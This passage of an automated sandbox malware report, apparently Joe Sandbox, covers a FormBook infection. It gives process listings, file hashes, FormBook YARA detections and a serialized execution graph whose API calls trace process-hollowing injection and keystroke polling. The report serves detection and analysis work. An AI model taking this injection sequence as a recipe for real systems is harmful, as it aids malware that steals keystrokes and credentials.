                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:23
                                                                                  Start time:00:56:33
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe"
                                                                                  Imagebase:0x480000
                                                                                  File size:817'160 bytes
                                                                                  MD5 hash:198FADC2115110C8B0B774C88C70215E
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  Target ID:24
                                                                                  Start time:00:56:34
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe"
                                                                                  Imagebase:0xe20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3732033818.0000000002FF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  Target ID:26
                                                                                  Start time:00:56:36
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Windows\SysWOW64\msinfo32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\msinfo32.exe"
                                                                                  Imagebase:0x890000
                                                                                  File size:338'432 bytes
                                                                                  MD5 hash:5C49B7B55D4AF40DB1047E08484D6656
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3732187753.00000000049F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3732135762.00000000049A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.3718055960.0000000002980000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  Target ID:27
                                                                                  Start time:02:14:04
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe"
                                                                                  Imagebase:0xe20000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.3733834808.0000000005440000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  Has exited:false

                                                                                  Target ID:29
                                                                                  Start time:02:14:17
                                                                                  Start date:09/12/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff722870000
                                                                                  File size:676'768 bytes
                                                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                    Execution Graph

                                                                                    Execution Coverage:12.9%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:3.5%
                                                                                    Total number of Nodes:1060
                                                                                    Total number of Limit Nodes:84
                                                                                    execution_graph: serialized node/edge listing of the interactive execution graph (numeric node ids and function addresses joined by "->" edges, truncated at the end of the page). The only information recoverable from the listing in text form is the set of Win32 API calls that appear as graph nodes: MonitorFromPoint, GetModuleHandleW, GetFocus, KiUserCallbackDispatcher, PostMessageW, GetClassInfoW, EnumThreadWindows, CreateIconFromResourceEx, DuplicateHandle, GetCurrentThreadId, CallWindowProcW, GetKeyState.
58b0bfc 11 API calls 79850->79851 79852 58b42aa 79851->79852 79852->79807 79854 c043288 79853->79854 79855 c0432aa 79854->79855 79856 58b367a 11 API calls 79854->79856 79857 58b3688 11 API calls 79854->79857 79858 58b4292 11 API calls 79854->79858 79855->79807 79856->79855 79857->79855 79858->79855 79860 79d0e68 79859->79860 79861 79d0e36 79859->79861 79860->79807 79862 79d0e3d 79861->79862 79952 79d0e90 79861->79952 79958 79d0e80 79861->79958 79862->79807 79866 c04cee9 79865->79866 79867 c04cf50 79866->79867 79868 c04cf0e 79866->79868 79877 c04cfa0 79866->79877 79871 c04cf1c 79867->79871 79875 c04cf61 79867->79875 79876 c04d1da 79867->79876 79869 c04cf13 79868->79869 79870 c04cf2a 79868->79870 79869->79871 79872 c04d139 79869->79872 79873 c04d0b0 79870->79873 79874 c04cf33 79870->79874 79885 c043020 11 API calls 79871->79885 79890 c04d09d 79871->79890 79978 c04b3d8 79872->79978 79974 c04b388 79873->79974 79874->79871 79881 c04d227 79874->79881 79882 c04d1e8 79874->79882 79883 c04d209 79874->79883 79884 c04cf42 79874->79884 79887 c04d147 79874->79887 79874->79890 79895 c04d056 79874->79895 79875->79871 79875->79881 79875->79882 79875->79883 79875->79890 79875->79895 79982 c04cadc 79876->79982 79877->79871 79877->79881 79877->79882 79877->79883 79886 c043020 11 API calls 79881->79886 79891 c043020 11 API calls 79882->79891 79892 c043020 11 API calls 79883->79892 79884->79871 79888 c04d1cc 79884->79888 79885->79890 79886->79890 79893 c043020 11 API calls 79887->79893 79986 c04b478 11 API calls 79888->79986 79890->79807 79891->79890 79892->79890 79893->79890 79964 c043020 79895->79964 79897 c042fb0 79896->79897 79898 c042fc9 79897->79898 79899 c043020 11 API calls 79897->79899 79898->79807 79899->79898 79901 c042fbf 79900->79901 79902 c042fc9 79900->79902 79903 c043020 11 API calls 79901->79903 79902->79807 79903->79902 79905 79d0e36 79904->79905 79906 79d0e68 79904->79906 79907 79d0e3d 79905->79907 79908 79d0e90 11 API calls 79905->79908 79909 79d0e80 11 API calls 
79905->79909 79906->79807 79907->79807 79908->79907 79909->79907 79911 c04cf09 79910->79911 79922 c04cfa0 79910->79922 79912 c04cf50 79911->79912 79913 c04cf0e 79911->79913 79916 c04cf1c 79912->79916 79920 c04cf61 79912->79920 79921 c04d1da 79912->79921 79914 c04cf13 79913->79914 79915 c04cf2a 79913->79915 79914->79916 79917 c04d139 79914->79917 79918 c04d0b0 79915->79918 79919 c04cf33 79915->79919 79930 c043020 11 API calls 79916->79930 79935 c04d09d 79916->79935 79923 c04b3d8 11 API calls 79917->79923 79925 c04b388 2 API calls 79918->79925 79919->79916 79926 c04d227 79919->79926 79927 c04d1e8 79919->79927 79928 c04d209 79919->79928 79929 c04cf42 79919->79929 79932 c04d147 79919->79932 79919->79935 79940 c04d056 79919->79940 79920->79916 79920->79926 79920->79927 79920->79928 79920->79935 79920->79940 79924 c04cadc 11 API calls 79921->79924 79922->79916 79922->79926 79922->79927 79922->79928 79923->79935 79924->79935 79925->79935 79931 c043020 11 API calls 79926->79931 79936 c043020 11 API calls 79927->79936 79937 c043020 11 API calls 79928->79937 79929->79916 79933 c04d1cc 79929->79933 79930->79935 79931->79935 79938 c043020 11 API calls 79932->79938 80041 c04b478 11 API calls 79933->80041 79935->79807 79936->79935 79937->79935 79938->79935 79939 c043020 11 API calls 79939->79935 79940->79939 79943 58b36d4 79941->79943 79942 58b3974 79942->79807 79943->79942 79944 58b3fb4 GetKeyState 79943->79944 79949 58b4082 79943->79949 79945 58b3fe0 GetKeyState 79944->79945 79947 58b4033 GetFocus 79945->79947 79947->79949 79949->79942 79950 c04d488 8 API calls 79949->79950 79951 c04d479 8 API calls 79949->79951 79950->79942 79951->79942 79953 79d0eb6 79952->79953 79954 79d0eeb 79952->79954 79953->79862 79954->79953 79955 58b367a 11 API calls 79954->79955 79956 58b3688 11 API calls 79954->79956 79957 58b4292 11 API calls 79954->79957 79955->79953 79956->79953 79957->79953 79960 79d0e89 79958->79960 79959 79d0eb6 79959->79862 79960->79959 79961 58b367a 11 API calls 79960->79961 
79962 58b3688 11 API calls 79960->79962 79963 58b4292 11 API calls 79960->79963 79961->79959 79962->79959 79963->79959 79965 c043032 79964->79965 79966 c04302b 79964->79966 80018 c043041 79965->80018 80024 c043050 79965->80024 79987 c04f560 79966->79987 80000 c04f4ef 79966->80000 80013 c04f67a 79966->80013 79967 c043030 79967->79890 79968 c043038 79968->79890 79975 c04b393 79974->79975 80037 c04cc38 79975->80037 79977 c04e4f2 79977->79890 79979 c04b3e3 79978->79979 79980 c043020 11 API calls 79979->79980 79981 c04d5fe 79980->79981 79981->79890 79983 c04cae7 79982->79983 79984 c043020 11 API calls 79983->79984 79985 c04fd39 79984->79985 79985->79890 79986->79890 79988 c04f58b 79987->79988 79989 c04f695 79988->79989 79990 c04f59b 79988->79990 79991 c043050 11 API calls 79989->79991 79995 c04f5a7 79990->79995 79998 c04f5e3 79990->79998 79992 c04f6a0 79991->79992 79992->79967 79993 c043050 11 API calls 79994 c04f68e 79993->79994 79994->79967 80031 c04cc88 79995->80031 79997 c04f5dc 79997->79967 79998->79993 79999 c04f673 79998->79999 79999->79967 80001 c04f4f9 80000->80001 80002 c04f695 80001->80002 80003 c04f59b 80001->80003 80004 c043050 11 API calls 80002->80004 80008 c04f5a7 80003->80008 80011 c04f5e3 80003->80011 80005 c04f6a0 80004->80005 80005->79967 80006 c043050 11 API calls 80007 c04f68e 80006->80007 80007->79967 80009 c04cc88 2 API calls 80008->80009 80010 c04f5dc 80009->80010 80010->79967 80011->80006 80012 c04f673 80011->80012 80012->79967 80014 c04f66d 80013->80014 80015 c04f673 80014->80015 80016 c043050 11 API calls 80014->80016 80015->79967 80017 c04f68e 80016->80017 80017->79967 80019 c043050 80018->80019 80020 c04306c 80019->80020 80021 58b3688 11 API calls 80019->80021 80022 58b4292 11 API calls 80019->80022 80023 58b367a 11 API calls 80019->80023 80020->79968 80021->80020 80022->80020 80023->80020 80025 c04305e 80024->80025 80027 c043080 80024->80027 80026 c04306c 80025->80026 80028 58b3688 11 API calls 80025->80028 80029 58b4292 11 API calls 
80025->80029 80030 58b367a 11 API calls 80025->80030 80026->79968 80027->79968 80028->80026 80029->80026 80030->80026 80032 c04cc93 80031->80032 80033 c04ef71 GetFocus 80032->80033 80034 c04efde 80032->80034 80035 c04ef99 80033->80035 80034->79997 80035->80034 80036 c04efdc KiUserCallbackDispatcher 80035->80036 80036->80034 80039 c04cc43 80037->80039 80038 c04e57e 80038->79977 80039->80038 80040 c04cc88 2 API calls 80039->80040 80040->80038 80041->79935 80042 79d0808 80043 79d082b 80042->80043 80045 c043020 11 API calls 80043->80045 80044 79d0834 80045->80044 80217 1b04668 80218 1b04672 80217->80218 80222 1b04758 80217->80222 80227 1b03e1c 80218->80227 80220 1b0468d 80223 1b0475d 80222->80223 80231 1b04868 80223->80231 80235 1b04858 80223->80235 80228 1b03e27 80227->80228 80243 1b05bfc 80228->80243 80230 1b06f90 80230->80220 80233 1b0488f 80231->80233 80232 1b0496c 80232->80232 80233->80232 80239 1b0449c 80233->80239 80236 1b0488f 80235->80236 80237 1b0449c CreateActCtxA 80236->80237 80238 1b0496c 80236->80238 80237->80238 80240 1b058f8 CreateActCtxA 80239->80240 80242 1b059bb 80240->80242 80244 1b05c07 80243->80244 80247 1b05c1c 80244->80247 80246 1b0712d 80246->80230 80248 1b05c27 80247->80248 80249 1b05c4c 14 API calls 80248->80249 80250 1b07202 80249->80250 80250->80246 79646 ccd7c90 79647 ccd7ca4 79646->79647 79653 ccd7dc9 79647->79653 79656 ccd7de8 79647->79656 79659 ccd8228 79647->79659 79662 ccd8238 79647->79662 79648 ccd7d76 79665 ccd7e40 79653->79665 79654 ccd7df6 79654->79648 79657 ccd7df6 79656->79657 79658 ccd7e40 6 API calls 79656->79658 79657->79648 79658->79657 79660 ccd7e40 6 API calls 79659->79660 79661 ccd8245 79660->79661 79661->79648 79663 ccd7e40 6 API calls 79662->79663 79664 ccd8245 79662->79664 79663->79664 79664->79648 79666 ccd7e62 79665->79666 79670 58b6278 79666->79670 79674 58b6268 79666->79674 79667 ccd7ec0 79667->79654 79671 58b6295 79670->79671 79673 58b62ab 79670->79673 79672 58b45a0 6 API calls 79671->79672 79671->79673 
79672->79673 79673->79667 79675 58b6278 79674->79675 79676 58b45a0 6 API calls 79675->79676 79677 58b62ab 79675->79677 79676->79677 79677->79667 79678 ccd4e90 79690 ccd4610 GetKeyState 79678->79690 79680 ccd4ebe 79682 ccd4610 5 API calls 79680->79682 79684 ccd4ed3 79680->79684 79683 ccd4f01 79682->79683 79685 ccd4f05 79683->79685 79686 ccd4610 5 API calls 79683->79686 79687 ccd4f26 79686->79687 79691 ccd4670 GetKeyState 79690->79691 79695 ccd46b5 GetKeyState 79691->79695 79694 ccd46fa GetKeyState 79698 ccd473f GetKeyState 79694->79698 79695->79694 79699 ccd4784 79698->79699 79699->79680 79700 ccd4f88 79699->79700 79704 ccd4f90 79699->79704 79701 ccd4f9e 79700->79701 79702 ccd4fa9 KiUserCallbackDispatcher 79701->79702 79703 ccd4fb2 79701->79703 79702->79703 79703->79680 79705 ccd4f9e 79704->79705 79706 ccd4fa9 KiUserCallbackDispatcher 79705->79706 79707 ccd4fb2 79705->79707 79706->79707 79707->79680 80046 181d01c 80047 181d034 80046->80047 80048 181d08e 80047->80048 80052 58b0ad4 11 API calls 80047->80052 80053 58b1e98 80047->80053 80057 58b1ea8 80047->80057 80061 58b2c08 80047->80061 80052->80048 80054 58b1ece 80053->80054 80055 58b0ad4 11 API calls 80054->80055 80056 58b1eef 80055->80056 80056->80048 80058 58b1ece 80057->80058 80059 58b0ad4 11 API calls 80058->80059 80060 58b1eef 80059->80060 80060->80048 80065 58b2c45 80061->80065 80062 58b2c79 80063 58b0bfc 11 API calls 80062->80063 80064 58b2c77 80063->80064 80065->80062 80066 58b2c69 80065->80066 80067 58b2e6c 11 API calls 80066->80067 80068 58b2d91 11 API calls 80066->80068 80069 58b2da0 11 API calls 80066->80069 80067->80064 80068->80064 80069->80064 80070 ccdb850 80071 ccdb876 80070->80071 80072 ccdb9db 80070->80072 80071->80072 80075 c04daf1 80071->80075 80078 c04daf8 PostMessageW 80071->80078 80076 c04daf9 PostMessageW 80075->80076 80077 c04db64 80076->80077 80077->80071 80079 c04db64 80078->80079 80079->80071 80251 79d5f40 80252 79d5f52 80251->80252 80253 79d606d 80252->80253 80255 c04cc88 2 API calls 
80252->80255 80256 c04ef10 80252->80256 80255->80253 80257 c04ef19 80256->80257 80258 c04efde 80257->80258 80259 c04ef71 GetFocus 80257->80259 80258->80253 80260 c04ef99 80259->80260 80260->80258 80261 c04efdc KiUserCallbackDispatcher 80260->80261 80261->80258 80262 c0409da 80263 c0409df 80262->80263 80270 c042bc8 80263->80270 80273 c042bb8 80263->80273 80264 c040ac8 80277 c0441e3 80264->80277 80281 c0441f0 80264->80281 80265 c040c9b 80272 58b45a0 6 API calls 80270->80272 80271 c042bd0 80271->80264 80272->80271 80274 c042bc8 80273->80274 80276 58b45a0 6 API calls 80274->80276 80275 c042bd0 80275->80264 80276->80275 80278 c044236 80277->80278 80279 c044244 GetForegroundWindow 80278->80279 80280 c04426c 80279->80280 80280->80265 80282 c044236 80281->80282 80283 c044244 GetForegroundWindow 80282->80283 80284 c04426c 80283->80284 80284->80265 80080 58b4428 80081 58b4438 80080->80081 80088 58b5a68 80081->80088 80100 58b5a52 80081->80100 80112 58b5d14 80081->80112 80118 c04d660 80081->80118 80122 c04d670 80081->80122 80082 58b4461 80092 58b5a94 80088->80092 80090 58b45a0 6 API calls 80091 58b5e74 80090->80091 80091->80082 80099 58b5ccc 80092->80099 80126 58b56e0 80092->80126 80093 58b5b4d 80094 58b45a0 6 API calls 80093->80094 80098 58b5bf5 80093->80098 80095 58b5bbf 80094->80095 80096 58b45a0 6 API calls 80095->80096 80096->80098 80097 58b45a0 6 API calls 80097->80099 80098->80097 80099->80090 80099->80091 80104 58b5a68 80100->80104 80101 58b56e0 6 API calls 80105 58b5b4d 80101->80105 80102 58b45a0 6 API calls 80103 58b5e74 80102->80103 80103->80082 80104->80101 80111 58b5ccc 80104->80111 80106 58b45a0 6 API calls 80105->80106 80110 58b5bf5 80105->80110 80107 58b5bbf 80106->80107 80108 58b45a0 6 API calls 80107->80108 80108->80110 80109 58b45a0 6 API calls 80109->80111 80110->80109 80111->80102 80111->80103 80113 58b5d1d 80112->80113 80115 58b5d3b 80112->80115 80114 58b45a0 6 API calls 80113->80114 80113->80115 80114->80115 80116 58b45a0 6 API calls 80115->80116 80117 
58b5e74 80115->80117 80116->80117 80117->80082 80119 c04d6a5 80118->80119 80121 58b5d14 6 API calls 80119->80121 80120 c04d6fa 80120->80082 80121->80120 80123 c04d6a5 80122->80123 80125 58b5d14 6 API calls 80123->80125 80124 c04d6fa 80124->80082 80125->80124 80128 58b56eb 80126->80128 80127 58b45a0 6 API calls 80130 58b5fc9 80127->80130 80129 58b45a0 6 API calls 80128->80129 80128->80130 80131 58b6007 80128->80131 80129->80130 80130->80127 80130->80131 80131->80093 79413 c04b020 79414 c04b048 79413->79414 79417 c049914 79414->79417 79418 c04991f 79417->79418 79419 c04b60c 79418->79419 79420 c04b709 79418->79420 79421 58b45a0 6 API calls 79418->79421 79419->79420 79424 79d6c80 79419->79424 79433 79d6c70 79419->79433 79421->79419 79426 79d6ce5 79424->79426 79425 79d5bf8 PeekMessageW 79425->79426 79426->79425 79428 79d7148 WaitMessage 79426->79428 79430 79d6d32 79426->79430 79431 79d72f1 PeekMessageW GetActiveWindow 79426->79431 79432 79d7300 PeekMessageW GetActiveWindow 79426->79432 79442 79d5c10 79426->79442 79445 79d5c44 79426->79445 79428->79426 79430->79420 79431->79426 79432->79426 79434 79d6c79 79433->79434 79435 79d5bf8 PeekMessageW 79434->79435 79436 79d5c10 KiUserCallbackDispatcher 79434->79436 79437 79d7148 WaitMessage 79434->79437 79438 79d5c44 DispatchMessageW 79434->79438 79439 79d6d32 79434->79439 79440 79d72f1 PeekMessageW GetActiveWindow 79434->79440 79441 79d7300 PeekMessageW GetActiveWindow 79434->79441 79435->79434 79436->79434 79437->79434 79438->79434 79439->79420 79440->79434 79441->79434 79443 79d75e8 KiUserCallbackDispatcher 79442->79443 79444 79d765c 79443->79444 79444->79426 79446 79d7ac0 DispatchMessageW 79445->79446 79447 79d7b2c 79446->79447 79447->79426 80285 c0430e0 80286 c043122 80285->80286 80287 c043128 SetWindowTextW 80285->80287 80286->80287 80288 c043159 80287->80288 80289 c043be0 80291 c043c07 80289->80291 80290 c043d0c 80291->80290 80292 c043c68 80291->80292 80293 1b0cac4 6 API calls 80291->80293 80297 1b0f578 80291->80297 
80292->80290 80296 79d2100 7 API calls 80292->80296 80301 79d2110 80292->80301 80293->80292 80296->80290 80298 1b0f588 80297->80298 80299 1b0dde8 6 API calls 80298->80299 80300 1b0f5af 80299->80300 80300->80292 80302 79d213a 80301->80302 80304 7ce17eb 6 API calls 80302->80304 80303 79d215c 80303->80290 80304->80303 80305 1b0d158 80306 1b0d19e GetCurrentProcess 80305->80306 80308 1b0d1f0 GetCurrentThread 80306->80308 80309 1b0d1e9 80306->80309 80310 1b0d226 80308->80310 80311 1b0d22d GetCurrentProcess 80308->80311 80309->80308 80310->80311 80314 1b0d263 80311->80314 80312 1b0d28b GetCurrentThreadId 80313 1b0d2bc 80312->80313 80314->80312 80315 1b0fc58 80317 1b0aaa8 2 API calls 80315->80317 80318 1b0aa99 2 API calls 80315->80318 80316 1b0fc91 80317->80316 80318->80316 80319 c04a6e8 80320 c04a753 80319->80320 80325 c04aae8 80319->80325 80321 c04a812 GetCapture 80320->80321 80320->80325 80323 c04a854 80321->80323 80322 c04a895 GetActiveWindow 80324 c04a8cc 80322->80324 80323->80322 80324->80325 80328 79d0448 80324->80328 80333 79d0428 80324->80333 80330 79d046e 80328->80330 80329 79d0482 80329->80325 80330->80329 80331 1b0de80 8 API calls 80330->80331 80332 1b0de88 8 API calls 80330->80332 80331->80329 80332->80329 80334 79d042d 80333->80334 80335 79d0482 80334->80335 80336 1b0de80 8 API calls 80334->80336 80337 1b0de88 8 API calls 80334->80337 80335->80325 80336->80335 80337->80335 79448 7ce04e0 79449 7ce0507 79448->79449 79451 7ce0725 79449->79451 79452 58bbdc0 7 API calls 79449->79452 79450 7ce0759 79452->79450 80132 79d1e33 80133 79d1e46 80132->80133 80138 79d2068 80133->80138 80142 79d2100 80133->80142 80150 79d2042 80133->80150 80134 79d1e69 80139 79d20a5 PostMessageW 80138->80139 80141 79d20d4 80139->80141 80141->80134 80143 79d2107 80142->80143 80144 79d20a1 PostMessageW 80142->80144 80143->80144 80147 79d210b 80143->80147 80146 79d20d4 80144->80146 80146->80134 80155 7ce17eb 80147->80155 80148 79d215c 80148->80134 80151 79d2049 80150->80151 80152 79d20b5 
PostMessageW 80151->80152 80154 79d1f81 80151->80154 80153 79d20d4 80152->80153 80153->80134 80154->80134 80156 7ce1804 80155->80156 80160 1b0eaff 80156->80160 80164 1b0eb10 80156->80164 80157 7ce1834 80157->80148 80161 1b0eb10 80160->80161 80162 1b0cac4 6 API calls 80161->80162 80163 1b0eb71 80161->80163 80162->80163 80163->80157 80166 1b0eb2d 80164->80166 80165 1b0eb71 80165->80157 80166->80165 80167 1b0cac4 6 API calls 80166->80167 80167->80165 80168 79ddd32 80169 79ddd39 80168->80169 80171 79ddcd5 80169->80171 80174 79ddd72 80169->80174 80179 79ddd80 80169->80179 80170 79ddd5e 80175 79ddd79 80174->80175 80176 79ddd15 80175->80176 80184 7ce6d90 80175->80184 80189 7ce6da0 80175->80189 80176->80170 80180 79dddb1 80179->80180 80181 79ddddd 80180->80181 80182 7ce6d90 DrawTextExW 80180->80182 80183 7ce6da0 DrawTextExW 80180->80183 80181->80170 80182->80181 80183->80181 80185 7ce6dd6 80184->80185 80186 7ce6d9e 80184->80186 80185->80176 80186->80185 80194 7ce4b5c 80186->80194 80188 7ce6e41 80191 7ce6dc1 80189->80191 80190 7ce6dd6 80190->80176 80191->80190 80192 7ce4b5c DrawTextExW 80191->80192 80193 7ce6e41 80192->80193 80196 7ce4b67 80194->80196 80195 7ce8349 80195->80188 80196->80195 80200 7ce8e18 80196->80200 80203 7ce8e08 80196->80203 80197 7ce845c 80197->80188 80207 7ce790c 80200->80207 80204 7ce8e18 80203->80204 80205 7ce790c DrawTextExW 80204->80205 80206 7ce8e35 80205->80206 80206->80197 80208 7ce8e50 DrawTextExW 80207->80208 80210 7ce8e35 80208->80210 80210->80197 80338 c04b8f6 80341 c04b108 80338->80341 80342 c04b113 80341->80342 80345 c04c108 80342->80345 80343 c04b903 80346 c04c111 GetCurrentThreadId 80345->80346 80348 c04c1ad 80346->80348 80348->80343 80211 58b1f38 SetWindowLongW 80212 58b1fa4 80211->80212 79453 ccda5f8 79454 ccda612 79453->79454 79469 ccdb06c 79454->79469 79473 ccdadb2 79454->79473 79477 ccdaeb4 79454->79477 79480 ccdaa70 79454->79480 79485 ccdaef8 79454->79485 79490 ccdacb5 79454->79490 79494 ccdacf9 79454->79494 79498 ccdadd9 
79454->79498 79501 ccdac7c 79454->79501 79504 ccdad1f 79454->79504 79508 ccdb208 79454->79508 79512 ccdaf83 79454->79512 79516 ccdb02d 79454->79516 79455 ccda636 79470 ccdb072 79469->79470 79471 ccdb26e 79470->79471 79520 755cb38 79470->79520 79471->79455 79474 ccdad36 79473->79474 79475 ccdad57 79474->79475 79524 755cd80 79474->79524 79475->79455 79478 ccdadd8 79477->79478 79479 755cd80 WriteProcessMemory 79478->79479 79479->79478 79528 755d008 79480->79528 79486 ccdaefe 79485->79486 79532 ccdb6c0 79486->79532 79536 ccdb6bb 79486->79536 79487 ccdb2ef 79491 ccdacb8 79490->79491 79492 ccdacfe 79491->79492 79493 755cd80 WriteProcessMemory 79491->79493 79493->79491 79495 ccdacfe 79494->79495 79496 ccdacb8 79494->79496 79496->79494 79497 755cd80 WriteProcessMemory 79496->79497 79497->79496 79499 ccdade9 79498->79499 79500 755cd80 WriteProcessMemory 79499->79500 79500->79499 79544 755cbe8 79501->79544 79505 ccdad25 79504->79505 79507 755cd80 WriteProcessMemory 79505->79507 79506 ccdad57 79506->79455 79507->79506 79509 ccdb299 79508->79509 79511 755cbe8 Wow64SetThreadContext 79509->79511 79510 ccdb2b4 79511->79510 79513 ccdaf89 79512->79513 79548 755ce70 79513->79548 79517 ccdaf8a 79516->79517 79518 ccdab37 79516->79518 79517->79518 79519 755ce70 ReadProcessMemory 79517->79519 79518->79455 79519->79518 79521 755cb78 ResumeThread 79520->79521 79523 755cba9 79521->79523 79523->79470 79525 755cdc8 WriteProcessMemory 79524->79525 79527 755ce1f 79525->79527 79527->79475 79529 755d091 CreateProcessA 79528->79529 79531 755d253 79529->79531 79533 ccdb6d5 79532->79533 79540 755ccc0 79533->79540 79537 ccdb6d5 79536->79537 79539 755ccc0 VirtualAllocEx 79537->79539 79538 ccdb6f4 79538->79487 79539->79538 79541 755cd00 VirtualAllocEx 79540->79541 79543 755cd3d 79541->79543 79543->79487 79545 755cc2d Wow64SetThreadContext 79544->79545 79547 755cc75 79545->79547 79549 755cebb ReadProcessMemory 79548->79549 79551 755ceff 79549->79551 79551->79455 79708 58b1cf0 79709 58b1d58 
CreateWindowExW 79708->79709 79711 58b1e14 79709->79711

                                                                                    Control-flow Graph

                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 'Tq$($($($)$)$)$)$)$.$$Tq
                                                                                    • API String ID: 0-2574248669
                                                                                    • Opcode ID: 88e623720cbd7eea442e1ff54e0b6ebfa87ff7885ad5f75d1065dc85ad84a638
                                                                                    • Instruction ID: b10a7a0e8175ed5d48373fc2b7091887152bf70562d61fe74b0cbc40f9a86dcb
                                                                                    • Opcode Fuzzy Hash: 88e623720cbd7eea442e1ff54e0b6ebfa87ff7885ad5f75d1065dc85ad84a638
                                                                                    • Instruction Fuzzy Hash: 2E624730A00705CFDB14EF78C894B9977B6EF89300F1486A9D809AF3A5DB75AD85CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [Control-flow graph for the function at 58b76b8: basic-block edge list from the report's interactive graph viewer (blocks marked Executed / Not Executed), not reproduced here. The graph contains no named Windows API calls, only calls to other functions in the same dump (58b740c to 58b760c, 58b577c, 58bc207, 58bc218, 1b05c7c, 1b08430, 7ce0d2b, 7ce0d30).]
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1317389286.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_58b0000_NEW.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 'Tq$($($($)$)$)$)$)$.$$Tq
                                                                                    • API String ID: 0-2574248669
                                                                                    • Opcode ID: daf32301ce7277711467770a400a4f35b72485872edd012a4955326f329fea6b
                                                                                    • Instruction ID: ce36344147a0b3419415d0015c86a9294b329cee8aee2e2aa29cc23159d5a8ce
                                                                                    • Opcode Fuzzy Hash: daf32301ce7277711467770a400a4f35b72485872edd012a4955326f329fea6b
                                                                                    • Instruction Fuzzy Hash: 07524634A00705CFDB14EF78C894A9977B6FF89300F1486A8D809AF3A5DB75AD85CB91

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    [Control-flow graph for the function at c04a6e8: basic-block edge list from the report's interactive graph viewer (blocks marked Executed / Not Executed), not reproduced here. Named Windows APIs in the graph: GetCapture and GetActiveWindow; the remaining call edges go to other functions in the dump (c042990, c042b18, c043554, c0497f4, c049804, c049814, c049824, c049830, c049840, c04984c, c04aeff, 79d0428, 79d0448, ccd7437, ccd7440, ccd76bc).]
APIs
Memory Dump Source
• Source File: 00000000.00000002.1362257457.000000000C040000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C040000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c040000_NEW.jbxd
Similarity
• API ID: ActiveCaptureWindow
• String ID:
• API String ID: 2424615356-0
• Opcode ID: 3df1adb7ed4b542b722bd63a75713ff92911f56a6267a86b10970629f0605c09
• Instruction ID: 5ac35677792bf450114b2ad00b039178bafc4f87314fd72a138d5ab94493d9e8
